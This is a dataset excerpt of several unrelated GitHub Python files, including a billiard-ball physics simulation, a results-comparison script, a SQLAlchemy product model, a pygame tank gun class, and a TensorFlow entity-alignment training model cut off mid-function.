hex(slider_int)\r\n # Drop the 0x at the beginning of the hex string\r\n slider_hex_digits = slider_hex[2:] \r\n # Ensure two digits of hexadecimal:\r\n if len(slider_hex_digits)==1:\r\n slider_hex_digits = '0' + slider_hex_digits \r\n return slider_hex_digits\r\n\r\ndef rand8bit():\r\n return random.randint(0,255)\r\ndef randcolor():\r\n '''Takes three IntVar and returns a color Tkinter string like #FFFFFF. \r\n '''\r\n r=hexstring(rand8bit())\r\n g=hexstring(rand8bit())\r\n b=hexstring(rand8bit())\r\n return '#'+r+g+b\r\n\r\ndef randpos():\r\n return [random.randint(margins[0]+20, dimensions[0]-margins[0]-20),random.randint(margins[1]+20, dimensions[1]-margins[1]-20)]\r\n\r\ndef randvel():\r\n return random.uniform(-200,200)\r\n\r\nfor i in range(20):\r\n x,y = randpos()\r\n create_ball(20, randcolor(), x, y, randvel(), randvel())\r\ncushion_deflection = 1\r\nrolling_friction = 1\r\nmin_vel = 1\r\n\r\ndef arctan(x, y):\r\n x = float(x)\r\n y = float(y)\r\n if x == 0:\r\n if y > 0:\r\n angle = math.pi/2\r\n elif y < 0:\r\n angle = -math.pi/2\r\n else:\r\n angle = 2*math.pi # Does not matter what value is\r\n elif y == 0:\r\n if x > 0:\r\n angle = 0.0\r\n else:\r\n angle = math.pi\r\n else:\r\n angle = math.atan(y/x)\r\n return angle\r\n\r\ndef dot_product(v1, v2):\r\n if len(v1) == len(v2):\r\n t = 0\r\n for i in range(len(v1)):\r\n t += v1[i]*v2[i]\r\n return t\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef scalar_product(scalar, vector):\r\n v = []\r\n for d in vector:\r\n v.append(d*scalar)\r\n return v\r\n\r\ndef add_vectors(v1, v2):\r\n if len(v1) == len(v2):\r\n v = []\r\n for i in range(len(v1)):\r\n v.append(v1[i]+v2[i])\r\n return v\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef subtract_vectors(v1, v2):\r\n if len(v1) == len(v2):\r\n v = []\r\n for i in range(len(v1)):\r\n v.append(v1[i]-v2[i])\r\n return v\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef square_sum(v):\r\n t = 0\r\n for d in v:\r\n t += d**2\r\n return t\r\n\r\ndef ball_collision(ball_i):\r\n x1, y1, x2, y2 = canvas.coords(balls[ball_i])\r\n ball_center = [(x1+x2)/2., (y1+y2)/2.]\r\n ball_radius = (x2-x1)/2.\r\n for other_i in range(0, len(balls)):\r\n if ball_i != other_i:\r\n x1, y1, x2, y2 = canvas.coords(balls[other_i])\r\n other_center = [(x1+x2)/2., (y1+y2)/2.]\r\n other_radius = (x2-x1)/2.\r\n if test_collision(ball_center, ball_radius, other_center, other_radius):\r\n if sorted((ball_i, other_i)) not in collided:\r\n vels[ball_i], vels[other_i] = calculate_collision(ball_center, vels[ball_i], other_center, vels[other_i])\r\n else:\r\n while sorted((ball_i, other_i)) in collided:\r\n collided.remove(sorted((ball_i, other_i)))\r\ndef test_collision(center1, radius1, center2, radius2):\r\n radial_distance = math.hypot(center1[0]-center2[0],center1[1]-center2[1])\r\n return (radius1 + radius2 >= radial_distance)\r\n\r\ndef calculate_collision(x1, v1, x2, v2):\r\n v1f = subtract_vectors(v1,scalar_product(float(dot_product(subtract_vectors(v1,v2),subtract_vectors(x1,x2)))/float(square_sum(subtract_vectors(x1,x2))),subtract_vectors(x1,x2)))\r\n v2f = subtract_vectors(add_vectors(v1,v2),v1f)\r\n return [v1f, v2f]\r\n\r\ndef animate():\r\n times.append(timer())\r\n ft = times[-1]-times[-2]\r\n for i in range(len(balls)):\r\n x1, y1, x2, y2 = canvas.coords(balls[i])\r\n if x1 <= cushion['left'] or x2 >= cushion['right']:\r\n if hit_x_cushion[i] == False:\r\n vels[i][0] = -cushion_deflection*vels[i][0]\r\n hit_x_cushion[i] = True\r\n else:\r\n hit_x_cushion[i] = False\r\n if y1 <= cushion['top'] or y2 >= cushion['bottom']:\r\n if hit_y_cushion[i] == False:\r\n vels[i][1] = -cushion_deflection*vels[i][1]\r\n hit_y_cushion[i] = True\r\n else:\r\n hit_y_cushion[i] = False\r\n ball_collision(i)\r\n canvas.move(balls[i], vels[i][0]*ft, vels[i][1]*ft)\r\n \r\n for i in range(len(vels)):\r\n vels[i] = [rolling_friction*vels[i][0], rolling_friction*vels[i][1]]\r\n if math.hypot(vels[i][0],vels[i][1]) < min_vel:\r\n vels[i] = [0,0]\r\n \r\n canvas.after(1, animate)\r\n\r\nanimate()\r\nroot.mainloop()\r\n\r\n","repo_name":"dmc573/minipool","sub_path":"MiniPool Physics works.py","file_name":"MiniPool Physics works.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4807288523","text":"fname1 = \"default_results.txt\"\r\nfname2 = \"results.txt\"\r\n\r\nf1 = open(fname1)\r\nf2 = open(fname2)\r\n\r\nprint(\"-----------------------------------\")\r\nprint(\"Comparing files \", \" > \" + fname1, \" < \" +fname2, sep='\\n')\r\nprint(\"-----------------------------------\")\r\nf1_line = f1.readline()\r\nf2_line = f2.readline()\r\n\r\nline_no = 1\r\n\r\nwhile f1_line != '' or f2_line != '':\r\n\r\n f1_line = f1_line.rstrip()\r\n f2_line = f2_line.rstrip()\r\n \r\n if f1_line != f2_line:\r\n \r\n if f2_line == '' and f1_line != '':\r\n print(\">+\", \"Case-%d\" % line_no, f1_line)\r\n elif f1_line != '':\r\n print(\">\", \"Case-%d\" % line_no, f1_line)\r\n \r\n if f1_line == '' and f2_line != '':\r\n print(\"<+\", \"Case-%d\" % line_no, f2_line)\r\n elif f2_line != '':\r\n print(\"<\", \"Case-%d\" % line_no, f2_line, \"\\n\" ,\"Test case %d failed\" % line_no)\r\n else:\r\n print(\"+\",\"Case-%d\" % line_no, \"Passed\")\r\n\t \r\n\r\n f1_line = f1.readline()\r\n f2_line = f2.readline()\r\n\r\n line_no += 1\r\n\r\nf1.close()\r\nf2.close()","repo_name":"sudhamshu091/Automation-of-HDL-Lab-evaluation-using-scripts","sub_path":"test/and_gate/sim/difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41921869499","text":"#!/usr/bin/python3\n\"\"\" Definig a user class \"\"\"\n\n\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import Column, String, Integer, Float, ForeignKey, Enum, event\nfrom sqlalchemy.orm import relationship\n\n\nclass Product(BaseModel, Base):\n \"\"\"Defining a user class\"\"\"\n\n __tablename__ = \"products\"\n\n name = Column(String(128), nullable=False)\n price = Column(Float, nullable=False)\n description = Column(String(1024))\n gender = Column(Enum(\"female\", \"male\", \"kid\"), default=None, nullable=True)\n category_id = Column(\n String(60), ForeignKey(\"categories.id\", ondelete=\"CASCADE\"),\n nullable=False\n )\n reviews = relationship(\n \"Review\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n cart_items = relationship(\n \"CartItem\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n urls = relationship(\n \"Url\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n","repo_name":"nathan-assefa/Online_store","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31529167555","text":"from ball import *\n\n'''\nДанная часть кода отвечает за действия с пушкой танка и запуском снарядов.\n'''\n\n\nclass Gun:\n def __init__(self, screen):\n '''\n Инициализация пушки\n screen: экран, на котором существует пушка\n '''\n self.screen = screen # экран, на котором существует пушка\n self.an = 1 # начальный угол наклона пушки\n self.h = 10 # ширина пушки\n self.l = 60 # длина пушки\n self.color = GREY # цвет пушки\n\n def fire2_end(self, x, y, speed):\n '''\n Функция выстрела из пушки.\n x: абсцисса точки появления снаряда\n y: ордината точки появления снаряда\n speed: скорость снаряда\n '''\n if len(balls) < 10: # на экране присутствует не более 10 снарядов одного игрока\n new_ball = Ball(self.screen, x, y)\n new_ball.vx = speed * math.cos(self.an) # рассчёт горизонтальной скорости снаряда\n new_ball.vy = speed * math.sin(self.an) # рассчёт вертикальной скорости снаряда\n balls.append(new_ball)\n\n def targetting(self, m_x, m_y, x, y):\n '''\n Функция наведения пушки на курсор. Высчитывает угол пушки с горизонтом в зависимости от входных параметров.\n m_x: абсцисса курсора\n m_y: ордината курсора\n x: абсцисса основания пушки\n y: ордината основания пушки\n '''\n self.an = math.atan2((m_y - y), (m_x - x))\n\n def draw(self, x, y):\n '''\n Функция отрисовки пушки\n x: абсцисса основания пушки\n y: ордината основания пушки\n '''\n pygame.draw.polygon(self.screen, self.color,\n [[x - self.h / 2 * np.sin(self.an), y + self.h / 2 * np.cos(self.an)],\n\n [x - self.h / 2 * np.sin(self.an) + self.l * np.cos(self.an),\n y + self.h / 2 * np.cos(self.an) + self.l * np.sin(self.an)],\n\n [x + self.h / 2 * np.sin(self.an) + self.l * np.cos(self.an),\n y - self.h / 2 * np.cos(self.an) + self.l * np.sin(self.an)],\n\n [x + self.h / 2 * np.sin(self.an), y - self.h / 2 * np.cos(self.an)]])\n","repo_name":"Sparinout/tanchiki_with_love","sub_path":"game/gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28713361640","text":"# Third question\n\nimport collections\nfrom one import words\n\ncn = collections.Counter(words)\nmost_common_list = cn.most_common(10)\n\nwith open(\"out_most_frequent.txt\", \"w\") as new_file_2:\n for i, j in enumerate(most_common_list):\n new_file_2.write(f\"{i+1}. {j[0]} {j[1]}\\n\")\n","repo_name":"snowball-grinch/hwpy","sub_path":"solutions/06.wasteland/three.py","file_name":"three.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"29417668291","text":"import math\nfrom .Init import *\nimport scipy.spatial\nimport json\nimport pickle as pkl\nimport os\n\ndef get_vmat(e, KG):\n du = [1] * e\n for tri in KG:\n if tri[0] != tri[2]:\n du[tri[0]] += 1\n du[tri[2]] += 1\n M = {}\n for tri in KG:\n if tri[0] == tri[2]:\n continue\n if (tri[0], tri[2]) not in M:\n M[(tri[0], tri[2])] = 1\n else:\n pass\n if (tri[2], tri[0]) not in M:\n M[(tri[2], tri[0])] = 1\n else:\n pass\n\n return M, du\n\n\ndef get_nbr(M, e, max_nbr):\n nbr = []\n for i in range(e):\n nbr.append([])\n for (i, j) in M:\n if i != j and (max_nbr == -1 or len(nbr[i]) < max_nbr):\n nbr[i].append(j)\n if max_nbr == -1:\n for i in range(e):\n if (len(nbr[i]) > max_nbr):\n max_nbr = len(nbr[i])\n\n mask = []\n for i in range(e):\n mask.append([1] * len(nbr[i]) + [0] * (max_nbr - len(nbr[i])))\n nbr[i] += [0] * (max_nbr - len(nbr[i]))\n\n return np.asarray(nbr, dtype=np.int32), np.asarray(mask)\n\n\ndef get_sparse_tensor(e, KG):\n print('getting a sparse tensor...')\n M0, du = get_vmat(e, KG)\n ind = []\n val = []\n for fir, sec in M0:\n ind.append((sec, fir))\n val.append(M0[(fir, sec)] / math.sqrt(du[fir]) / math.sqrt(du[sec]))\n\n M = tf.SparseTensor(indices=ind, values=val, dense_shape=[e, e])\n\n return M0, M\n\n\ndef get_se_input_layer(e, dimension, file_path):\n print('adding the primal input layer...')\n with open(file=file_path, mode='r', encoding='utf-8') as f:\n embedding_list = json.load(f)\n print(len(embedding_list), 'rows,', len(embedding_list[0]), 'columns.')\n input_embeddings = tf.convert_to_tensor(embedding_list)\n ent_embeddings = tf.Variable(input_embeddings)\n return tf.nn.l2_normalize(ent_embeddings, 1)\n\n\ndef add_diag_layer(inlayer, dimension, M, act_func, dropout=0.0, init=ones):\n inlayer = tf.nn.dropout(inlayer, 1 - dropout)\n print('adding a layer...')\n w0 = init([1, dimension])\n tosum = tf.sparse_tensor_dense_matmul(M, tf.multiply(inlayer, w0))\n if act_func is None:\n return tosum\n else:\n return act_func(tosum)\n\n\ndef highway(layer1, layer2, dimension):\n kernel_gate = glorot([dimension, dimension])\n bias_gate = zeros([dimension])\n transform_gate = tf.matmul(layer1, kernel_gate) + bias_gate\n transform_gate = tf.nn.sigmoid(transform_gate)\n carry_gate = 1.0 - transform_gate\n return transform_gate * layer2 + carry_gate * layer1\n\n\ndef softmax_positiv(T):\n Tsign = tf.greater(T, 0)\n _reduce_sum = tf.reduce_sum(\n tf.exp(tf.where(Tsign, T, tf.zeros_like(T))), -1, keepdims=True) + math.e\n return tf.where(Tsign, tf.exp(T) / _reduce_sum, T)\n\n\ndef neighborhood_matching(inlayer, mask, max_nbr, beta):\n inlayer_ILL = tf.tile(tf.expand_dims(inlayer[0], 2), [1, 1, max_nbr, 1])\n inlayer_can = tf.tile(tf.expand_dims(inlayer[1], 2), [1, 1, max_nbr, 1])\n inlayer_ILL_trans = tf.transpose(inlayer_ILL, [0, 2, 1, 3])\n inlayer_can_trans = tf.transpose(inlayer_can, [0, 2, 1, 3])\n sim_ILL = tf.reduce_sum(tf.multiply(inlayer_ILL, inlayer_can_trans), -1)\n sim_can = tf.reduce_sum(tf.multiply(inlayer_can, inlayer_ILL_trans), -1)\n mask_ILL = tf.expand_dims(mask[0], -1)\n mask_can = tf.expand_dims(mask[1], 1)\n mask_all = tf.einsum('ijk,ikl->ijl', mask_ILL, mask_can)\n\n a_ILL = softmax_positiv(tf.multiply(sim_ILL, mask_all))\n a_can = softmax_positiv(tf.multiply(\n sim_can, tf.transpose(mask_all, [0, 2, 1])))\n\n m_ILL = inlayer[0] - \\\n tf.reduce_sum(tf.multiply(inlayer_can_trans,\n tf.expand_dims(a_ILL, -1)), 2)\n m_can = inlayer[1] - \\\n tf.reduce_sum(tf.multiply(inlayer_ILL_trans,\n tf.expand_dims(a_can, -1)), 2)\n m = tf.stack([m_ILL, m_can], 0) * beta\n output_layer = tf.concat([inlayer, m], -1)\n return output_layer\n\n\ndef mock_neighborhood_matching(inlayer, nbr_weight, max_nbr, beta):\n inlayer_ILL = tf.tile(tf.expand_dims(inlayer[0], 2), [1, 1, max_nbr, 1])\n inlayer_can = tf.tile(tf.expand_dims(inlayer[1], 2), [1, 1, max_nbr, 1])\n inlayer_ILL_trans = tf.transpose(inlayer_ILL, [0, 2, 1, 3])\n inlayer_can_trans = tf.transpose(inlayer_can, [0, 2, 1, 3])\n sim_ILL = tf.reduce_sum(tf.multiply(inlayer_ILL, inlayer_can_trans), -1)\n sim_can = tf.reduce_sum(tf.multiply(inlayer_can, inlayer_ILL_trans), -1)\n weight_ILL = tf.expand_dims(nbr_weight[0], -1)\n weight_can = tf.expand_dims(nbr_weight[1], 1)\n weight_all = tf.einsum('ijk,ikl->ijl', weight_ILL, weight_can)\n\n a_ILL = softmax_positiv(tf.multiply(sim_ILL, weight_all))\n a_can = softmax_positiv(tf.multiply(\n sim_can, tf.transpose(weight_all, [0, 2, 1])))\n\n m_ILL = inlayer[0] - \\\n tf.reduce_sum(tf.multiply(inlayer_can_trans,\n tf.expand_dims(a_ILL, -1)), 2)\n m_can = inlayer[1] - \\\n tf.reduce_sum(tf.multiply(inlayer_ILL_trans,\n tf.expand_dims(a_can, -1)), 2)\n m = tf.stack([m_ILL, m_can], 0) * beta\n output_layer = tf.concat([inlayer, m], -1)\n return output_layer\n\n\ndef neighborhood_aggregation(outlayer, mask, w_gate, w_N, act_func):\n weight_ij = tf.einsum('ijkl,lp->ijkp', outlayer, w_gate)\n if act_func is not None:\n weight_ij = act_func(weight_ij) \n h_sum = tf.einsum('ijkl,ijkl->ijkl', outlayer, weight_ij)\n h_sum = tf.reduce_sum(tf.multiply(h_sum, tf.expand_dims(mask, -1)), 2)\n h_j = tf.einsum('ijk,kl->ijl', h_sum, w_N) \n return h_j\n\n\ndef mock_neighborhood_aggregation(outlayer, nbr_weight, w_gate, w_N, act_func):\n weight_ij = tf.einsum('ijkl,lp->ijkp', outlayer, w_gate)\n if act_func is not None:\n weight_ij = act_func(weight_ij)\n h_sum = tf.einsum('ijkl,ijkl->ijkl', outlayer, weight_ij)\n h_sum = tf.reduce_sum(tf.multiply(\n h_sum, tf.expand_dims(nbr_weight, -1)), 2)\n h_j = tf.einsum('ijk,kl->ijl', h_sum, w_N)\n return h_j\n\n\ndef get_loss_pre(outlayer, ILL, gamma, k, neg_left, neg_right, neg2_left, neg2_right):\n left = ILL[:, 0]\n right = ILL[:, 1]\n left_x = tf.nn.embedding_lookup(outlayer, left)\n right_x = tf.nn.embedding_lookup(outlayer, right)\n\n A = tf.reduce_sum(tf.abs(left_x - right_x), 1)\n neg_l_x = tf.nn.embedding_lookup(outlayer, neg_left)\n neg_r_x = tf.nn.embedding_lookup(outlayer, neg_right)\n B = tf.reduce_sum(tf.abs(neg_l_x - neg_r_x), 1)\n C = - tf.reshape(B, [-1, k])\n D = A + gamma\n L1 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n neg_l_x = tf.nn.embedding_lookup(outlayer, neg2_left)\n neg_r_x = tf.nn.embedding_lookup(outlayer, neg2_right)\n B = tf.reduce_sum(tf.abs(neg_l_x - neg_r_x), 1)\n C = - tf.reshape(B, [-1, k])\n L2 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n return (tf.reduce_mean(L1) + tf.reduce_mean(L2)) / 2.0\n\n\ndef get_loss_match(outlayer, ILL, gamma, c, dimension):\n out = tf.reshape(outlayer, [2, -1, 2, c, dimension])\n A = tf.reduce_sum(tf.abs(out[0, :, 0, 0] - out[1, :, 0, 0]), -1)\n B = tf.reduce_sum(tf.abs(out[0, :, 0, 1:c] - out[1, :, 0, 1:c]), -1)\n C = - tf.reshape(B, [-1, c - 1])\n D = A + gamma\n L1 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n B = tf.reduce_sum(tf.abs(out[0, :, 1, 1:c] - out[1, :, 1, 1:c]), -1)\n C = - tf.reshape(B, [-1, c - 1])\n L2 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n return (tf.reduce_mean(L1) + tf.reduce_mean(L2)) / 2.0\n\n\ndef get_loss_w(select_train, outlayer, nbr_all,\n mask_all, sample_w, w_gate, w_N,\n ILL, max_nbr_all, beta):\n left = tf.gather(ILL[:, 0], select_train)\n right = tf.gather(ILL[:, 1], select_train)\n t = 10\n idx = tf.concat([left, right], axis=0) \n\n outlayer_idx = tf.gather(outlayer, idx)\n nbr_idx = tf.gather(nbr_all, idx)\n mask_idx = tf.to_float(tf.gather(mask_all, idx))\n outlayer_nbr_idx = tf.gather(outlayer, nbr_idx)\n out_sim = tf.einsum('ij,ijk->ik', tf.matmul(outlayer_idx, sample_w),\n tf.transpose(outlayer_nbr_idx, [0, 2, 1]))\n nbr_weight = tf.reshape(softmax_positiv(tf.multiply(\n out_sim, mask_idx)), (2, t, -1)) \n\n outlayer_idx = tf.reshape(outlayer_idx, (2, t, -1))\n nbr_idx = tf.reshape(nbr_idx, (2, t, -1))\n outlayer_nbr_idx = tf.gather(outlayer, nbr_idx)\n mock_hat_h = mock_neighborhood_matching(\n outlayer_nbr_idx, nbr_weight, max_nbr_all, beta) \n mock_g = mock_neighborhood_aggregation(\n mock_hat_h, nbr_weight, w_gate, w_N, tf.sigmoid)\n left_x = tf.concat([outlayer_idx[0], mock_g[0]], axis=-1)\n right_x = tf.concat([outlayer_idx[1], mock_g[1]], axis=-1)\n\n A = tf.reduce_sum(tf.abs(left_x - right_x), 1)\n return tf.reduce_mean(A)\n\n\ndef build(dimension, dimension_g, act_func, gamma, k, vec_path, e, all_nbr_num, sampled_nbr_num, beta, KG):\n tf.reset_default_graph()\n input_layer = get_se_input_layer(e, dimension, vec_path)\n M0, M = get_sparse_tensor(e, KG)\n nbr_all, mask_all = get_nbr(M0, e, all_nbr_num)\n\n print('KG structure embedding')\n hidden_layer_1 = add_diag_layer(\n input_layer, dimension, M, act_func, dropout=0.0)\n hidden_layer = highway(input_layer, hidden_layer_1, dimension)\n hidden_layer_2 = add_diag_layer(\n hidden_layer, dimension, M, act_func, dropout=0.0)\n output_h = highway(hidden_layer, hidden_layer_2, dimension)\n print('shape of output_h: ', output_h.get_shape())\n\n c = tf.placeholder(tf.int32, None, \"c\")\n nbr_sampled = tf.placeholder(tf.int32, [e, sampled_nbr_num], \"nbr_sampled\")\n mask_sampled = tf.placeholder(tf.float32, [e, sampled_nbr_num], \"mask_sampled\")\n ILL = tf.placeholder(tf.int32, [None, 2], \"ILL\")\n candidate = tf.placeholder(tf.int32, [None], \"candidate\") \n candidate = tf.reshape(tf.transpose(\n tf.reshape(candidate, (2, -1, c)), (1, 0, 2)), [-1]) \n idx_pair = tf.stack(\n [tf.reshape(tf.tile(tf.expand_dims(ILL, -1), (1, 1, c)), [-1]), candidate])\n nbr_pair = tf.gather(nbr_sampled, idx_pair)\n mask_pair = tf.gather(mask_sampled, idx_pair)\n h_ctr = tf.nn.embedding_lookup(output_h, idx_pair)\n h_nbr = tf.nn.embedding_lookup(\n output_h, nbr_pair)\n\n w_gate = glorot([dimension * 2, dimension * 2])\n w_N = glorot([dimension * 2, dimension_g])\n\n print('neighborhood matching')\n output_hat_h = neighborhood_matching(h_nbr, mask_pair, sampled_nbr_num, beta)\n print('shape of output_hat_h: ', output_hat_h.get_shape())\n\n print('neighborhood aggregation')\n output_g = neighborhood_aggregation(\n output_hat_h, mask_pair, w_gate, w_N, tf.sigmoid)\n output_h_match = tf.concat([tf.reshape(\n h_ctr, [-1, dimension]), tf.reshape(output_g, [-1, dimension_g])], -1)\n dimension3 = dimension + dimension_g\n print('shape of output_h_match: ', output_h_match.get_shape())\n\n print(\"compute pre-training loss\")\n neg_left = tf.placeholder(tf.int32, [None], \"neg_left\") \n neg_right = tf.placeholder(tf.int32, [None], \"neg_right\")\n neg2_left = tf.placeholder(tf.int32, [None], \"neg2_left\")\n neg2_right = tf.placeholder(tf.int32, [None], \"neg2_right\")\n loss_pre = get_loss_pre(output_h, ILL, gamma, k, neg_left,\n neg_right, neg2_left, neg2_right)\n\n print(\"compute overall loss\")\n loss_match = get_loss_match(output_h_match, ILL, gamma, c, dimension3)\n alpha = tf.placeholder(tf.float32, None, \"alpha\")\n loss_all = (1 - alpha) * loss_pre + alpha * loss_match\n\n print(\"compute sampling process loss\")\n select_train = tf.placeholder(tf.int32, [10], \"select_train\")\n sample_w = tf.Variable(tf.eye(dimension, name=\"sample_w\"))\n loss_w = get_loss_w(select_train, output_h, nbr_all,\n mask_all, sample_w, w_gate, w_N,\n ILL, all_nbr_num, beta)\n\n return output_h, output_h_match, loss_all, sample_w, loss_w, M0, nbr_all, mask_all\n\n\ndef get_neg(ILL, output_layer, k, batchnum):\n neg = []\n t = len(ILL)\n ILL_vec = np.array([output_layer[e1] for e1 in ILL])\n KG_vec = np.array(output_layer)\n for p in range(batchnum):\n head = int(t / batchnum * p)\n if p==batchnum-1:\n tail=t\n else:\n tail = int(t / batchnum * (p + 1))\n sim = scipy.spatial.distance.cdist(\n ILL_vec[head:tail], KG_vec, metric='cityblock')\n for i in range(tail - head):\n rank = sim[i, :].argsort()\n neg.append(rank[0: k])\n\n neg = np.array(neg)\n neg = neg.reshape((t * k,))\n\n return neg\n\n\ndef np_softmax(x, T=0.1):\n x = x - np.max(x, axis=-1, keepdims=True)\n return np.exp(x / T) / np.sum(np.exp(x / T), axis=-1, keepdims=True)\n\n\ndef sample_nbr(out, nbr_all, mask_all, e, max_nbr, w, batchnum):\n nbr = []\n for p in range(batchnum):\n head = int(e / batchnum * p)\n if p==batchnum-1:\n tail=e\n else:\n tail = int(e / batchnum * (p + 1))\n mask_p = mask_all[head:tail]\n nbr_p = nbr_all[head:tail]\n sim = np.dot(np.dot(out[head:tail], w), out.transpose())\n x_axis_index = np.tile(np.arange(tail - head),\n (nbr_all.shape[1], 1)).transpose()\n\n eps = 1e-8\n prob = sim[x_axis_index, nbr_p] - 1e8 * (1 - mask_p)\n prob = np_softmax(prob) + eps * mask_p\n prob = prob / np.sum(prob, axis=1, keepdims=True)\n\n for i in range(tail - head):\n if np.sum(mask_p[i]) > max_nbr:\n nbr.append(nbr_p[i, np.random.choice(\n nbr_all.shape[1], max_nbr, replace=False, p=prob[i])])\n else:\n nbr.append(nbr_p[i, 0:max_nbr])\n mask = mask_all[:, 0:max_nbr]\n\n return nbr, mask\n\n\ndef mask_candidate(e, e1, e2):\n mask_e1 = np.zeros(e)\n mask_e2 = np.zeros(e)\n for x in e1:\n mask_e1[x] = 1\n for x in e2:\n mask_e2[x] = 1\n return mask_e1, mask_e2\n\n\ndef sample_candidate(ILL, ILL_true, out, k, mask_e, batchnum):\n t = len(ILL)\n e = len(out)\n ILL_vec = np.array([out[x] for x in ILL])\n KG_vec = np.array(out)\n neg = []\n for p in range(batchnum):\n head = int(t / batchnum * p)\n if p==batchnum-1:\n tail=t\n else:\n tail = int(t / batchnum * (p + 1))\n sim = scipy.spatial.distance.cdist(\n ILL_vec[head:tail], KG_vec, metric='cityblock')\n mask_gold = np.zeros((tail - head, e))\n for i in range(tail - head):\n mask_gold[i][ILL_true[i + head]] = 1\n mask = np.tile(mask_e, (tail - head, 1)) + mask_gold\n prob = np_softmax(- sim - 1e8 * mask_gold)\n for i in range(tail - head):\n neg.append(np.random.choice(e, k - 1, replace=False, p=prob[i]))\n\n candidate = np.concatenate(\n (np.expand_dims(ILL_true, -1), np.asarray(neg)), axis=1)\n candidate = candidate.reshape((t * k,))\n return candidate\n\n\ndef training(output_h, output_h_match, loss_all, sample_w, loss_w, learning_rate, \n epochs, pre_epochs, ILL, e, k, sampled_nbr_num, save_suffix, dimension, dimension_g, c, \n train_batchnum, test_batchnum,\n test, M0, e1, e2, nbr_all, mask_all):\n from include.Test import get_hits, get_hits_new\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_all)\n train_step_w = tf.train.AdamOptimizer(\n learning_rate).minimize(loss_w, var_list=[sample_w])\n print('initializing...')\n saver = tf.train.Saver()\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n print('running...')\n J = []\n ILL = np.array(ILL)\n t = len(ILL)\n ILL_reshape = np.reshape(ILL, 2 * t, order='F')\n L = np.ones((t, k)) * (ILL[:, 0].reshape((t, 1)))\n neg_left = L.reshape((t * k,))\n L = np.ones((t, k)) * (ILL[:, 1].reshape((t, 1)))\n neg2_right = L.reshape((t * k,))\n\n nbr_sampled, mask_sampled = get_nbr(M0, e, sampled_nbr_num)\n mask_e1, mask_e2 = mask_candidate(e, e1, e2)\n test_reshape = np.reshape(np.array(test), -1, order='F')\n sample_w_vec = np.identity(dimension)\n test_can_num=50\n\n if not os.path.exists(\"model/\"):\n os.makedirs(\"model/\")\n\n if os.path.exists(\"model/save_\"+save_suffix+\".ckpt.meta\"):\n saver.restore(sess, \"model/save_\"+save_suffix+\".ckpt\")\n start_epoch=pre_epochs\n else:\n start_epoch=0\n\n for i in range(start_epoch, epochs):\n if i % 50 == 0:\n out = sess.run(output_h)\n print('get negative pairs')\n neg2_left = get_neg(ILL[:, 1], out, k, train_batchnum)\n neg_right = get_neg(ILL[:, 0], out, k, train_batchnum)\n print('sample candidates')\n c_left = sample_candidate(ILL[:, 1], ILL[:, 0], out, c, mask_e2, train_batchnum)\n c_right = sample_candidate(ILL[:, 0], ILL[:, 1], out, c, mask_e1, train_batchnum)\n candidate = np.reshape(np.concatenate(\n (c_right, c_left), axis=0), (2, len(ILL), c)) \n print('sample neighborhood')\n nbr_sampled, mask_sampled = sample_nbr(\n out, nbr_all, mask_all, e, sampled_nbr_num, sample_w_vec, test_batchnum)\n feeddict = {\"ILL:0\": ILL,\n \"candidate:0\": candidate.reshape((-1,)),\n \"neg_left:0\": neg_left,\n \"neg_right:0\": neg_right,\n \"neg2_left:0\": neg2_left,\n \"neg2_right:0\": neg2_right,\n \"nbr_sampled:0\": nbr_sampled,\n \"mask_sampled:0\": mask_sampled,\n \"c:0\": c}\n\n if i < pre_epochs:\n feeddict[\"alpha:0\"] = 0\n else:\n feeddict[\"alpha:0\"] = 1\n\n for j in range(train_batchnum):\n beg = int(t / train_batchnum * j)\n if j==train_batchnum-1:\n end=t\n else:\n end = int(t / train_batchnum * (j + 1))\n feeddict[\"ILL:0\"] = ILL[beg:end]\n feeddict[\"candidate:0\"] = candidate[:, beg:end].reshape((-1,))\n feeddict[\"neg_left:0\"] = neg_left.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg_right:0\"] = neg_right.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg2_left:0\"] = neg2_left.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg2_right:0\"] = neg2_right.reshape(\n (t, k))[beg:end].reshape((-1,))\n _ = sess.run([train_step], feed_dict=feeddict)\n\n if i == pre_epochs - 1:\n save_path = saver.save(sess, \"model/save_\"+save_suffix+\".ckpt\")\n print(\"Save to path: \", save_path)\n\n if i % 10 == 0:\n print('%d/%d' % (i + 1, epochs), 'epochs...')\n outvec = sess.run(output_h, feed_dict=feeddict)\n test_can = get_hits(outvec, test, test_can_num)\n if i >= pre_epochs:\n for j in range(test_batchnum):\n beg = int(len(test) / test_batchnum * j)\n if j==test_batchnum-1:\n end=len(test)\n else:\n end = int(len(test) / test_batchnum * (j + 1))\n feeddict_test = {\"ILL:0\": test[beg:end],\n \"candidate:0\": test_can[:, beg:end].reshape((-1,)),\n \"nbr_sampled:0\": nbr_sampled,\n \"mask_sampled:0\": mask_sampled,\n \"c:0\": 